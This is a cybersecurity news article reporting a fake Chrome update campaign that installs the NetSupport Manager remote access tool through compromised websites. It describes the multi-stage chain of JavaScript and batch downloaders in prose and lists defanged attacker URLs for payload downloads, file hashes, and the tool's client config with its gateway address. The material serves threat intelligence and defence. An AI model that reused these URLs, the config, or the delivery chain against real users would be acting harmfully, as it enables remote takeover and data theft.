Beware of Fake Chrome Browser Updates that Install Malware

Reports indicate that there seems to be an ongoing campaign that lures victims into installing a Remote Administration Tool called NetSupport Manager with fake Chrome browser updates. 

Threat actors use this remote administration software as an info stealer and to take control of the victim’s computers. Investigations point this to a suspected SocGholish campaign which was previously conducted by a Russian threat actor but still remains inconclusive.

Fake Chromium updates campaign (Source: Trellix)

However, the SVP of Trellix Advanced Research Center stated that “Chromium with 63.55% of market share is now the de facto most targeted browser for NetSupport RAT attacks, due to the global usage. Organizations need holistic global threat intelligence and innovative security solutions to get the governance and tools needed to reduce the cyber risk.”

Document

FREE Webinar

API Attacks Have Increased by 400% – Understand the Fundamentals of Protecting Your APIs with a Positive Security Model – Register Now for a Free Webinar

Fake Chrome Browser Update

These fake chromium updates are spread through compromised websites which are injected with a simple HTML script tag that loads malicious JavaScript content from the C2 servers of threat actors. However, this process seems to be automated and follows a directory structure.

Further analysis showed many compromised websites with traffic from the Federal Government, Financial institutions, and consulting services. These compromised websites can be detected by checking the “/cdn-js/wds.min.php”.

Previously, threat actors used PowerShell with WMI functionality for downloading and installing the RAT. However, the current campaign uses batch files (.bat), VBscripts, and curl tools instead of PowerShell scripts for the RAT download.

When a user clicks on the fake browser update link, it downloads a ZIP archive, “UpdateInstall.zip” which consists of a malicious JS file named “Browser_portable.js” that acts as a next-stage malware downloader.

The second stage JS file is named “Chrome_update.js” which is retrieved from the C2 server of the threat actors and executed. This downloads a batch file “1.bat” in the local “C://ProgramData” folder and runs it.

In addition to this, the 1.bat drops VBScript and batch files, which are investigated to be a dummy one as they were not executed. Further components and the final batch script 2.bat is downloaded using curl commands. 

These components consist of the 7-zip archive file, which is the NetSupport Manager RAT software package and is executed by the 2.bat file.

A complete report has been published by Trellix, which provides detailed information on this campaign and the malware source code.

Indicators of Compromise

hxxps://altiordp[.]com/cdn/www.php
hxxps://cheetahsnv[.]com/cdn-js/wds.min.php
hxxps://ponraj[.]com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/1.bat?964084
hxxps://ponraj[.]com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/tempy.7z
hxxps://ponraj[.]com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/7zz.exe
hxxps://ponraj[.]com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/2.bat

Files

e67f8b91555993e6315ffa9b146c759b9eeac5208116667fa4b31c717ebe5398 *1.bat 675ede331d690fff93579f9767aa7f80cfbc9d4b99afe298ba3b456ee292ac71 *2.bat c136b1467d669a725478a6110ebaaab3cb88a3d389dfa688e06173c066b76fcf *7zz.exe 00cf43f66d27692f25da1771dca7bf8c3c0e5aa78b35090013b013c17ceb0fff *Chrome_update.js b9711d8d6d1fd59ea9276a70e0b37c28ae26a105c325448e5d62f7858d61b8c2 *UpdateInstaller.zip 7f976e221ece8acac5f6ea32d2ad427a9bcb237e6a6f754043265073cc004ce1 *Browser_portable.js 42679bd369a3b772c43b9ba20bf8a31a2593a360cfa2de77aa6d2023f9a0c109 *tempy.7z
Client32 config
[HTTP]
CMPI=60
GatewayAddress=5.252.178.48:443
GSK=GA;L@KDPHB Port=443
SecondaryGateway=
SecondaryPort=

Keep informed about the latest Cyber Security News by following us on GoogleNews, Linkedin, Twitter, and Facebook.

Leave a Reply

Your email address will not be published. Required fields are marked *